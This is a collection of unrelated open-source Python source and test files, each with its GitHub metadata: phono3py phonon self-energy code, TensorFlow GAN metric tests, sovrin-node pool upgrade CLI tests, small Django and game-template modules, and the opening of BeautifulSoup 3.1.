for i, (w, interaction) in enumerate(zip(self._weights_at_q,
self._pp_strength)):
for j, k in list(np.ndindex(interaction.shape[1:])):
g1 = self._g[0, i, :, j, k]
self._imag_self_energy[:] += g1 * interaction[:, j, k] * w
self._imag_self_energy *= self._unit_conversion
def _run_py_with_frequency_points_with_g(self):
if self._temperature > 0:
self._ise_thm_with_frequency_points()
else:
self._ise_thm_with_frequency_points_0K()
def _ise_thm_with_frequency_points(self):
for i, (tp, w, interaction) in enumerate(zip(self._triplets_at_q,
self._weights_at_q,
self._pp_strength)):
for j, k in list(np.ndindex(interaction.shape[1:])):
f1 = self._frequencies[tp[1]][j]
f2 = self._frequencies[tp[2]][k]
if (f1 > self._cutoff_frequency and
f2 > self._cutoff_frequency):
n2 = bose_einstein(f1, self._temperature)
n3 = bose_einstein(f2, self._temperature)
g1 = self._g[0, i, :, j, k]
g2_g3 = self._g[1, i, :, j, k] # g2 - g3
for l in range(len(interaction)):
self._imag_self_energy[:, l] += (
(n2 + n3 + 1) * g1 +
(n2 - n3) * (g2_g3)) * interaction[l, j, k] * w
self._imag_self_energy *= self._unit_conversion
def _ise_thm_with_frequency_points_0K(self):
for i, (w, interaction) in enumerate(zip(self._weights_at_q,
self._pp_strength)):
for j, k in list(np.ndindex(interaction.shape[1:])):
g1 = self._g[0, i, :, j, k]
for l in range(len(interaction)):
self._imag_self_energy[:, l] += g1 * interaction[l, j, k] * w
self._imag_self_energy *= self._unit_conversion
def _average_by_degeneracy(self, imag_self_energy):
return average_by_degeneracy(imag_self_energy,
self._pp.band_indices,
self._frequencies[self._grid_point])
def run_ise_at_frequency_points_batch(
_frequency_points,
ise,
temperatures,
gamma,
write_gamma_detail=False,
return_gamma_detail=False,
detailed_gamma_at_gp=None,
scattering_event_class=None,
nelems_in_batch=50,
log_level=0):
if nelems_in_batch is None:
_nelems_in_batch = 10
else:
_nelems_in_batch = nelems_in_batch
batches = _get_batches(len(_frequency_points), _nelems_in_batch)
if log_level:
print("Calculations at %d frequency points are devided into "
"%d batches." % (len(_frequency_points), len(batches)))
for bi, fpts_batch in enumerate(batches):
if log_level:
print("%d/%d: %s" % (bi + 1, len(batches), fpts_batch + 1))
sys.stdout.flush()
ise.set_frequency_points(_frequency_points[fpts_batch])
ise.set_integration_weights(
scattering_event_class=scattering_event_class)
for l, t in enumerate(temperatures):
ise.set_temperature(t)
ise.run()
gamma[l, :, fpts_batch] = ise.get_imag_self_energy()
if write_gamma_detail or return_gamma_detail:
detailed_gamma_at_gp[l, fpts_batch] = (
ise.get_detailed_imag_self_energy())
def _get_batches(tot_nelems, nelems=10):
nbatch = tot_nelems // nelems
batches = [np.arange(i * nelems, (i + 1) * nelems)
for i in range(nbatch)]
if tot_nelems % nelems > 0:
batches.append(np.arange(nelems * nbatch, tot_nelems))
return batches
| {
"content_hash": "43f1b114e39c3d1a04d5d25ea22e5de8",
"timestamp": "",
"source": "github",
"line_count": 747,
"max_line_length": 81,
"avg_line_length": 40.32797858099063,
"alnum_prop": 0.5163153526970954,
"repo_name": "atztogo/phono3py",
"id": "4ecafff7f05b27bc32dfdc0d7426e7b1b4affc80",
"size": "31708",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "phono3py/phonon3/imag_self_energy.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "246"
},
{
"name": "C",
"bytes": "464971"
},
{
"name": "C++",
"bytes": "10277"
},
{
"name": "Python",
"bytes": "648829"
},
{
"name": "Shell",
"bytes": "1490"
}
],
"symlink_target": ""
} |
"""Tests for TFGAN classifier_metrics."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tarfile
import tempfile
import numpy as np
from scipy import linalg as scp_linalg
from google.protobuf import text_format
from tensorflow.contrib.gan.python.eval.python import classifier_metrics_impl as classifier_metrics
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
mock = test.mock
def _numpy_softmax(x):
e_x = np.exp(x - np.max(x, axis=1)[:, None])
return e_x / np.sum(e_x, axis=1)[:, None]
def _expected_inception_score(logits):
p = _numpy_softmax(logits)
q = np.expand_dims(np.mean(p, 0), 0)
per_example_logincscore = np.sum(p * (np.log(p) - np.log(q)), 1)
return np.exp(np.mean(per_example_logincscore))
def _expected_fid(real_imgs, gen_imgs):
m = np.mean(real_imgs, axis=0)
m_v = np.mean(gen_imgs, axis=0)
sigma = np.cov(real_imgs, rowvar=False)
sigma_v = np.cov(gen_imgs, rowvar=False)
sqcc = scp_linalg.sqrtm(np.dot(sigma, sigma_v))
mean = np.square(m - m_v).sum()
trace = np.trace(sigma + sigma_v - 2 * sqcc)
fid = mean + trace
return fid
def _expected_trace_sqrt_product(sigma, sigma_v):
return np.trace(scp_linalg.sqrtm(np.dot(sigma, sigma_v)))
# A dummy GraphDef string with the minimum number of Ops.
graphdef_string = """
node {
name: "Mul"
op: "Placeholder"
attr {
key: "dtype"
value {
type: DT_FLOAT
}
}
attr {
key: "shape"
value {
shape {
dim {
size: -1
}
dim {
size: 299
}
dim {
size: 299
}
dim {
size: 3
}
}
}
}
}
node {
name: "logits"
op: "Placeholder"
attr {
key: "dtype"
value {
type: DT_FLOAT
}
}
attr {
key: "shape"
value {
shape {
dim {
size: -1
}
dim {
size: 1001
}
}
}
}
}
node {
name: "pool_3"
op: "Placeholder"
attr {
key: "dtype"
value {
type: DT_FLOAT
}
}
attr {
key: "shape"
value {
shape {
dim {
size: -1
}
dim {
size: 2048
}
}
}
}
}
versions {
producer: 24
}
"""
def _get_dummy_graphdef():
dummy_graphdef = graph_pb2.GraphDef()
text_format.Merge(graphdef_string, dummy_graphdef)
return dummy_graphdef
def _run_with_mock(function, *args, **kwargs):
with mock.patch.object(
classifier_metrics,
'get_graph_def_from_url_tarball') as mock_tarball_getter:
mock_tarball_getter.return_value = _get_dummy_graphdef()
return function(*args, **kwargs)
class ClassifierMetricsTest(test.TestCase):
def test_run_inception_graph(self):
"""Test `run_inception` graph construction."""
batch_size = 7
img = array_ops.ones([batch_size, 299, 299, 3])
logits = _run_with_mock(classifier_metrics.run_inception, img)
self.assertTrue(isinstance(logits, ops.Tensor))
logits.shape.assert_is_compatible_with([batch_size, 1001])
# Check that none of the model variables are trainable.
self.assertListEqual([], variables.trainable_variables())
def test_run_inception_graph_pool_output(self):
"""Test `run_inception` graph construction with pool output."""
batch_size = 3
img = array_ops.ones([batch_size, 299, 299, 3])
pool = _run_with_mock(
classifier_metrics.run_inception, img,
output_tensor=classifier_metrics.INCEPTION_FINAL_POOL)
self.assertTrue(isinstance(pool, ops.Tensor))
pool.shape.assert_is_compatible_with([batch_size, 2048])
# Check that none of the model variables are trainable.
self.assertListEqual([], variables.trainable_variables())
def test_inception_score_graph(self):
"""Test `inception_score` graph construction."""
score = _run_with_mock(classifier_metrics.inception_score,
array_ops.zeros([6, 299, 299, 3]), num_batches=3)
self.assertTrue(isinstance(score, ops.Tensor))
score.shape.assert_has_rank(0)
# Check that none of the model variables are trainable.
self.assertListEqual([], variables.trainable_variables())
def test_frechet_inception_distance_graph(self):
"""Test `frechet_inception_distance` graph construction."""
img = array_ops.ones([7, 299, 299, 3])
distance = _run_with_mock(
classifier_metrics.frechet_inception_distance, img, img)
self.assertTrue(isinstance(distance, ops.Tensor))
distance.shape.assert_has_rank(0)
# Check that none of the model variables are trainable.
self.assertListEqual([], variables.trainable_variables())
def test_run_inception_multicall(self):
"""Test that `run_inception` can be called multiple times."""
for batch_size in (7, 3, 2):
img = array_ops.ones([batch_size, 299, 299, 3])
_run_with_mock(classifier_metrics.run_inception, img)
def test_invalid_input(self):
"""Test that functions properly fail on invalid input."""
with self.assertRaisesRegexp(ValueError, 'Shapes .* are incompatible'):
classifier_metrics.run_inception(array_ops.ones([7, 50, 50, 3]))
p = array_ops.zeros([8, 10])
p_logits = array_ops.zeros([8, 10])
q = array_ops.zeros([10])
with self.assertRaisesRegexp(ValueError, 'must be floating type'):
classifier_metrics._kl_divergence(
array_ops.zeros([8, 10], dtype=dtypes.int32), p_logits, q)
with self.assertRaisesRegexp(ValueError, 'must be floating type'):
classifier_metrics._kl_divergence(
p, array_ops.zeros([8, 10], dtype=dtypes.int32), q)
with self.assertRaisesRegexp(ValueError, 'must be floating type'):
classifier_metrics._kl_divergence(
p, p_logits, array_ops.zeros([10], dtype=dtypes.int32))
with self.assertRaisesRegexp(ValueError, 'must have rank 2'):
classifier_metrics._kl_divergence(array_ops.zeros([8]), p_logits, q)
with self.assertRaisesRegexp(ValueError, 'must have rank 2'):
classifier_metrics._kl_divergence(p, array_ops.zeros([8]), q)
with self.assertRaisesRegexp(ValueError, 'must have rank 1'):
classifier_metrics._kl_divergence(p, p_logits, array_ops.zeros([10, 8]))
def test_inception_score_value(self):
"""Test that `inception_score` gives the correct value."""
logits = np.array([np.array([1, 2] * 500 + [4]),
np.array([4, 5] * 500 + [6])])
unused_image = array_ops.zeros([2, 299, 299, 3])
incscore = _run_with_mock(classifier_metrics.inception_score, unused_image)
with self.test_session(use_gpu=True) as sess:
incscore_np = sess.run(incscore, {'concat:0': logits})
self.assertAllClose(_expected_inception_score(logits), incscore_np)
def test_frechet_classifier_distance_value(self):
"""Test that `frechet_classifier_distance` gives the correct value."""
np.random.seed(0)
# Make num_examples > num_features to ensure scipy's sqrtm function
# doesn't return a complex matrix.
test_pool_real_a = np.float32(np.random.randn(512, 256))
test_pool_gen_a = np.float32(np.random.randn(512, 256))
fid_op = _run_with_mock(classifier_metrics.frechet_classifier_distance,
test_pool_real_a, test_pool_gen_a,
classifier_fn=lambda x: x)
with self.test_session() as sess:
actual_fid = sess.run(fid_op)
expected_fid = _expected_fid(test_pool_real_a, test_pool_gen_a)
self.assertAllClose(expected_fid, actual_fid, 0.0001)
def test_trace_sqrt_product_value(self):
"""Test that `trace_sqrt_product` gives the correct value."""
np.random.seed(0)
# Make num_examples > num_features to ensure scipy's sqrtm function
# doesn't return a complex matrix.
test_pool_real_a = np.float32(np.random.randn(512, 256))
test_pool_gen_a = np.float32(np.random.randn(512, 256))
cov_real = np.cov(test_pool_real_a, rowvar=False)
cov_gen = np.cov(test_pool_gen_a, rowvar=False)
trace_sqrt_prod_op = _run_with_mock(classifier_metrics.trace_sqrt_product,
cov_real, cov_gen)
with self.test_session() as sess:
# trace_sqrt_product: tsp
actual_tsp = sess.run(trace_sqrt_prod_op)
expected_tsp = _expected_trace_sqrt_product(cov_real, cov_gen)
self.assertAllClose(actual_tsp, expected_tsp, 0.01)
def test_preprocess_image_graph(self):
"""Test `preprocess_image` graph construction."""
incorrectly_sized_image = array_ops.zeros([520, 240, 3])
correct_image = classifier_metrics.preprocess_image(
images=incorrectly_sized_image)
_run_with_mock(classifier_metrics.run_inception,
array_ops.expand_dims(correct_image, 0))
def test_get_graph_def_from_url_tarball(self):
"""Test `get_graph_def_from_url_tarball`."""
# Write dummy binary GraphDef to tempfile.
with tempfile.NamedTemporaryFile(delete=False) as tmp_file:
tmp_file.write(_get_dummy_graphdef().SerializeToString())
relative_path = os.path.relpath(tmp_file.name)
# Create gzip tarball.
tar_dir = tempfile.mkdtemp()
tar_filename = os.path.join(tar_dir, 'tmp.tar.gz')
with tarfile.open(tar_filename, 'w:gz') as tar:
tar.add(relative_path)
with mock.patch.object(classifier_metrics, 'urllib') as mock_urllib:
mock_urllib.request.urlretrieve.return_value = tar_filename, None
graph_def = classifier_metrics.get_graph_def_from_url_tarball(
'unused_url', relative_path)
self.assertIsInstance(graph_def, graph_pb2.GraphDef)
self.assertEqual(_get_dummy_graphdef(), graph_def)
if __name__ == '__main__':
test.main()
| {
"content_hash": "efa7d0f05e05d9535d9cc18672b16165",
"timestamp": "",
"source": "github",
"line_count": 322,
"max_line_length": 99,
"avg_line_length": 30.847826086956523,
"alnum_prop": 0.6505587435819994,
"repo_name": "dyoung418/tensorflow",
"id": "92e0a995748c1c4c2ddfff0daae59be5a6eaefb4",
"size": "10622",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/gan/python/eval/python/classifier_metrics_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "155915"
},
{
"name": "C++",
"bytes": "9052366"
},
{
"name": "CMake",
"bytes": "29372"
},
{
"name": "CSS",
"bytes": "1297"
},
{
"name": "HTML",
"bytes": "763492"
},
{
"name": "Java",
"bytes": "38854"
},
{
"name": "JavaScript",
"bytes": "10779"
},
{
"name": "Jupyter Notebook",
"bytes": "1772913"
},
{
"name": "Protocol Buffer",
"bytes": "110178"
},
{
"name": "Python",
"bytes": "6032114"
},
{
"name": "Shell",
"bytes": "165125"
},
{
"name": "TypeScript",
"bytes": "403037"
}
],
"symlink_target": ""
} |
from copy import copy
import pytest
from sovrin_node.test import waits
from stp_core.loop.eventually import eventually
from plenum.common.constants import VERSION
from sovrin_common.constants import ACTION, CANCEL, JUSTIFICATION
from sovrin_node.test.upgrade.helper import checkUpgradeScheduled, \
checkNoUpgradeScheduled
from sovrin_node.test.upgrade.conftest import validUpgrade, validUpgradeExpForceFalse, validUpgradeExpForceTrue
def send_upgrade_cmd(do, expect, upgrade_data):
do('send POOL_UPGRADE name={name} version={version} sha256={sha256} '
'action={action} schedule={schedule} timeout={timeout}',
within=10,
expect=expect, mapper=upgrade_data)
@pytest.fixture(scope="module")
def poolUpgradeSubmitted(be, do, trusteeCli, validUpgrade):
be(trusteeCli)
send_upgrade_cmd(do,
['Sending pool upgrade',
'Pool Upgrade Transaction Scheduled'],
validUpgrade)
@pytest.fixture(scope="module")
def poolUpgradeScheduled(poolUpgradeSubmitted, poolNodesStarted, validUpgrade):
nodes = poolNodesStarted.nodes.values()
timeout = waits.expectedUpgradeScheduled()
poolNodesStarted.looper.run(
eventually(checkUpgradeScheduled, nodes,
validUpgrade[VERSION], retryWait=1, timeout=timeout))
@pytest.fixture(scope="module")
def poolUpgradeCancelled(poolUpgradeScheduled, be, do, trusteeCli,
validUpgrade):
validUpgrade = copy(validUpgrade)
validUpgrade[ACTION] = CANCEL
validUpgrade[JUSTIFICATION] = '"not gonna give you one"'
be(trusteeCli)
do('send POOL_UPGRADE name={name} version={version} sha256={sha256} '
'action={action} justification={justification}',
within=10,
expect=['Sending pool upgrade', 'Pool Upgrade Transaction Scheduled'],
mapper=validUpgrade)
def test_pool_upgrade_rejected(be, do, newStewardCli, validUpgrade):
"""
Pool upgrade done by a non trustee is rejected
"""
be(newStewardCli)
err_msg = "Pool upgrade failed: client request invalid: " \
"UnauthorizedClientRequest('STEWARD cannot do POOL_UPGRADE'"
send_upgrade_cmd(do,
['Sending pool upgrade',
err_msg],
validUpgrade)
def testPoolUpgradeSent(poolUpgradeScheduled):
pass
def testPoolUpgradeCancelled(poolUpgradeCancelled, poolNodesStarted):
nodes = poolNodesStarted.nodes.values()
timeout = waits.expectedNoUpgradeScheduled()
poolNodesStarted.looper.run(
eventually(checkNoUpgradeScheduled,
nodes, retryWait=1, timeout=timeout))
def send_force_false_upgrade_cmd(do, expect, upgrade_data):
do('send POOL_UPGRADE name={name} version={version} sha256={sha256} '
'action={action} schedule={schedule} timeout={timeout} force=False',
within=10,
expect=expect, mapper=upgrade_data)
def test_force_false_upgrade(
be, do, trusteeCli, poolNodesStarted, validUpgradeExpForceFalse):
be(trusteeCli)
send_force_false_upgrade_cmd(do,
['Sending pool upgrade',
'Pool Upgrade Transaction Scheduled'],
validUpgradeExpForceFalse)
poolNodesStarted.looper.run(
eventually(
checkUpgradeScheduled,
poolNodesStarted.nodes.values(),
validUpgradeExpForceFalse[VERSION],
retryWait=1,
timeout=10))
def send_force_true_upgrade_cmd(do, expect, upgrade_data):
do('send POOL_UPGRADE name={name} version={version} sha256={sha256} '
'action={action} schedule={schedule} timeout={timeout} force=True',
within=10,
expect=expect, mapper=upgrade_data)
def test_force_upgrade(be, do, trusteeCli, poolNodesStarted,
validUpgradeExpForceTrue):
nodes = poolNodesStarted.nodes.values()
for node in nodes:
if node.name in ["Delta", "Gamma"]:
node.stop()
poolNodesStarted.looper.removeProdable(node)
be(trusteeCli)
send_force_true_upgrade_cmd(
do, ['Sending pool upgrade'], validUpgradeExpForceTrue)
def checksched():
for node in nodes:
if node.name not in ["Delta", "Gamma"]:
assert node.upgrader.scheduledUpgrade
assert node.upgrader.scheduledUpgrade[0] == validUpgradeExpForceTrue[VERSION]
poolNodesStarted.looper.run(eventually(
checksched, retryWait=1, timeout=10))
def send_reinstall_true_upgrade_cmd(do, expect, upgrade_data):
do('send POOL_UPGRADE name={name} version={version} sha256={sha256} '
'action={action} schedule={schedule} timeout={timeout} reinstall=True',
within=10,
expect=expect, mapper=upgrade_data)
def send_reinstall_false_upgrade_cmd(do, expect, upgrade_data):
do('send POOL_UPGRADE name={name} version={version} sha256={sha256} '
'action={action} schedule={schedule} timeout={timeout} reinstall=False',
within=10,
expect=expect, mapper=upgrade_data)
| {
"content_hash": "3aa61bebab34f3f9d4cf8aa0f8f4a55d",
"timestamp": "",
"source": "github",
"line_count": 140,
"max_line_length": 111,
"avg_line_length": 36.57142857142857,
"alnum_prop": 0.6689453125,
"repo_name": "keenondrums/sovrin-node",
"id": "1275d2b7c2dc58a0a91e25f05eec166ebacb0ddd",
"size": "5120",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sovrin_client/test/cli/test_pool_upgrade.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3195"
},
{
"name": "Python",
"bytes": "1088655"
},
{
"name": "Rust",
"bytes": "25532"
},
{
"name": "Shell",
"bytes": "15720"
}
],
"symlink_target": ""
} |
import pytest
import sys
from os import path
test_dir = path.dirname(path.realpath(__file__))
sys.path.insert(0, path.dirname(test_dir))
if __name__ == '__main__':
raise SystemExit(pytest.main())
| {
"content_hash": "dc9add4307a401466831ee6cdf350e5f",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 48,
"avg_line_length": 20.3,
"alnum_prop": 0.6798029556650246,
"repo_name": "six8/python-clom",
"id": "854c6628ed650cfe521d251cfdec146ef84b0b9c",
"size": "225",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "src/tests/runtests.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "4627"
},
{
"name": "Python",
"bytes": "41119"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django import template
# This will add the localsite tags as built-in tags, and override the existing
# {% url %} tag in Django.
template.add_to_builtins(__name__ + '.localsite')
| {
"content_hash": "fe19fa9aadbb7130033b67c833de4dd8",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 78,
"avg_line_length": 28.375,
"alnum_prop": 0.7268722466960352,
"repo_name": "1tush/reviewboard",
"id": "88c59d9ba5206bd70d73c677e8e2a17a0b55c994",
"size": "227",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "reviewboard/site/templatetags/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "685"
},
{
"name": "C#",
"bytes": "340"
},
{
"name": "CSS",
"bytes": "157867"
},
{
"name": "Java",
"bytes": "340"
},
{
"name": "JavaScript",
"bytes": "1256833"
},
{
"name": "Objective-C",
"bytes": "288"
},
{
"name": "PHP",
"bytes": "278"
},
{
"name": "Perl",
"bytes": "103"
},
{
"name": "Python",
"bytes": "3124372"
},
{
"name": "Ruby",
"bytes": "172"
},
{
"name": "Shell",
"bytes": "963"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_dressed_tatooine_alkhara_champion.iff"
result.attribute_template_id = 9
result.stfName("theme_park_name","alkhara_champion")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | {
"content_hash": "74df77fcef23bfea06d4c81c025b53ba",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 79,
"avg_line_length": 24.692307692307693,
"alnum_prop": 0.7102803738317757,
"repo_name": "obi-two/Rebelion",
"id": "60971b68df8d298c086db486ef02ac42b8d6cf86",
"size": "466",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/mobile/shared_dressed_tatooine_alkhara_champion.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
"""
Beautiful Soup parses a (possibly invalid) XML or HTML document into a tree representation.
It provides methods and Pythonic idioms that make it easy to navigate, search, and modify the tree.
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup parses a (possibly invalid) XML or HTML document into a
tree representation. It provides methods and Pythonic idioms that make
it easy to navigate, search, and modify the tree.
A well-formed XML/HTML document yields a well-formed data
structure. An ill-formed XML/HTML document yields a correspondingly
ill-formed data structure. If your document is only locally
well-formed, you can use this library to find and process the
well-formed part of it.
Beautiful Soup works with Python 2.2 and up. It has no external
dependencies, but you'll have more success at converting data to UTF-8
if you also install these three packages:
* chardet, for auto-detecting character encodings
http://chardet.feedparser.org/
* cjkcodecs and iconv_codec, which add more encodings to the ones supported
by stock Python.
http://cjkpython.i18n.org/
Beautiful Soup defines classes for two main parsing strategies:
* BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific
language that kind of looks like XML.
* BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid
or invalid. This class has web browser-like heuristics for
obtaining a sensible parse tree in the face of common HTML errors.
Beautiful Soup also defines a class (UnicodeDammit) for autodetecting
the encoding of an HTML or XML document, and converting it to
Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser.
For more than you ever wanted to know about Beautiful Soup, see the
documentation:
http://www.crummy.com/software/BeautifulSoup/documentation.html
Here, have some legalese:
Copyright (c) 2004-2009, Leonard Richardson
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* Neither the name of the the Beautiful Soup Consortium and All
Night Kosher Bakery nor the names of its contributors may be
used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT.
"""
from __future__ import generators
__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "3.1.0.1"
__copyright__ = "Copyright (c) 2004-2009 Leonard Richardson"
__license__ = "New-style BSD"
import codecs
import markupbase
import types
import re
from HTMLParser import HTMLParser, HTMLParseError
try:
from htmlentitydefs import name2codepoint
except ImportError:
name2codepoint = {}
try:
set
except NameError:
from sets import Set as set
#These hacks make Beautiful Soup able to parse XML with namespaces
markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match
DEFAULT_OUTPUT_ENCODING = "utf-8"
# First, the classes that represent markup elements.
def sob(unicode, encoding):
"""Returns either the given Unicode string or its encoding."""
if encoding is None:
return unicode
else:
return unicode.encode(encoding)
class PageElement:
"""Contains the navigational information for some part of the page
(either a tag or a piece of text)"""
def setup(self, parent=None, previous=None):
"""Sets up the initial relations between this element and
other elements."""
self.parent = parent
self.previous = previous
self.next = None
self.previousSibling = None
self.nextSibling = None
if self.parent and self.parent.contents:
self.previousSibling = self.parent.contents[-1]
self.previousSibling.nextSibling = self
def replaceWith(self, replaceWith):
oldParent = self.parent
myIndex = self.parent.contents.index(self)
if hasattr(replaceWith, 'parent') and replaceWith.parent == self.parent:
# We're replacing this element with one of its siblings.
index = self.parent.contents.index(replaceWith)
if index and index < myIndex:
# Furthermore, it comes before this element. That
# means that when we extract it, the index of this
# element will change.
myIndex = myIndex - 1
self.extract()
oldParent.insert(myIndex, replaceWith)
def extract(self):
"""Destructively rips this element out of the tree."""
if self.parent:
try:
self.parent.contents.remove(self)
except ValueError:
pass
#Find the two elements that would be next to each other if
#this element (and any children) hadn't been parsed. Connect
#the two.
lastChild = self._lastRecursiveChild()
nextElement = lastChild.next
if self.previous:
self.previous.next = nextElement
if nextElement:
nextElement.previous = self.previous
self.previous = None
lastChild.next = None
self.parent = None
if self.previousSibling:
self.previousSibling.nextSibling = self.nextSibling
if self.nextSibling:
self.nextSibling.previousSibling = self.previousSibling
self.previousSibling = self.nextSibling = None
return self
def _lastRecursiveChild(self):
"Finds the last element beneath this object to be parsed."
lastChild = self
while hasattr(lastChild, 'contents') and lastChild.contents:
lastChild = lastChild.contents[-1]
return lastChild
def insert(self, position, newChild):
if (isinstance(newChild, basestring)
or isinstance(newChild, unicode)) \
and not isinstance(newChild, NavigableString):
newChild = NavigableString(newChild)
position = min(position, len(self.contents))
if hasattr(newChild, 'parent') and newChild.parent != None:
# We're 'inserting' an element that's already one
# of this object's children.
if newChild.parent == self:
index = self.find(newChild)
if index and index < position:
# Furthermore we're moving it further down the
# list of this object's children. That means that
# when we extract this element, our target index
# will jump down one.
position = position - 1
newChild.extract()
newChild.parent = self
previousChild = None
if position == 0:
newChild.previousSibling = None
newChild.previous = self
else:
previousChild = self.contents[position-1]
newChild.previousSibling = previousChild
newChild.previousSibling.nextSibling = newChild
newChild.previous = previousChild._lastRecursiveChild()
if newChild.previous:
newChild.previous.next = newChild
newChildsLastElement = newChild._lastRecursiveChild()
if position >= len(self.contents):
newChild.nextSibling = None
parent = self
parentsNextSibling = None
while not parentsNextSibling:
parentsNextSibling = parent.nextSibling
parent = parent.parent
if not parent: # This is the last element in the document.
break
if parentsNextSibling:
newChildsLastElement.next = parentsNextSibling
else:
newChildsLastElement.next = None
else:
nextChild = self.contents[position]
newChild.nextSibling = nextChild
if newChild.nextSibling:
newChild.nextSibling.previousSibling = newChild
newChildsLastElement.next = nextChild
if newChildsLastElement.next:
newChildsLastElement.next.previous = newChildsLastElement
self.contents.insert(position, newChild)
def append(self, tag):
"""Appends the given tag to the contents of this tag."""
self.insert(len(self.contents), tag)
def findNext(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the first item that matches the given criteria and
appears after this Tag in the document."""
return self._findOne(self.findAllNext, name, attrs, text, **kwargs)
def findAllNext(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns all items that match the given criteria and appear
after this Tag in the document."""
return self._findAll(name, attrs, text, limit, self.nextGenerator,
**kwargs)
def findNextSibling(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears after this Tag in the document."""
return self._findOne(self.findNextSiblings, name, attrs, text,
**kwargs)
def findNextSiblings(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns the siblings of this Tag that match the given
criteria and appear after this Tag in the document."""
return self._findAll(name, attrs, text, limit,
self.nextSiblingGenerator, **kwargs)
fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x
def findPrevious(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the first item that matches the given criteria and
appears before this Tag in the document."""
return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs)
def findAllPrevious(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns all items that match the given criteria and appear
before this Tag in the document."""
return self._findAll(name, attrs, text, limit, self.previousGenerator,
**kwargs)
fetchPrevious = findAllPrevious # Compatibility with pre-3.x
def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears before this Tag in the document."""
return self._findOne(self.findPreviousSiblings, name, attrs, text,
**kwargs)
def findPreviousSiblings(self, name=None, attrs={}, text=None,
limit=None, **kwargs):
"""Returns the siblings of this Tag that match the given
criteria and appear before this Tag in the document."""
return self._findAll(name, attrs, text, limit,
self.previousSiblingGenerator, **kwargs)
fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x
def findParent(self, name=None, attrs={}, **kwargs):
"""Returns the closest parent of this Tag that matches the given
criteria."""
# NOTE: We can't use _findOne because findParents takes a different
# set of arguments.
r = None
l = self.findParents(name, attrs, 1)
if l:
r = l[0]
return r
def findParents(self, name=None, attrs={}, limit=None, **kwargs):
"""Returns the parents of this Tag that match the given
criteria."""
return self._findAll(name, attrs, None, limit, self.parentGenerator,
**kwargs)
fetchParents = findParents # Compatibility with pre-3.x
#These methods do the real heavy lifting.
def _findOne(self, method, name, attrs, text, **kwargs):
r = None
l = method(name, attrs, text, 1, **kwargs)
if l:
r = l[0]
return r
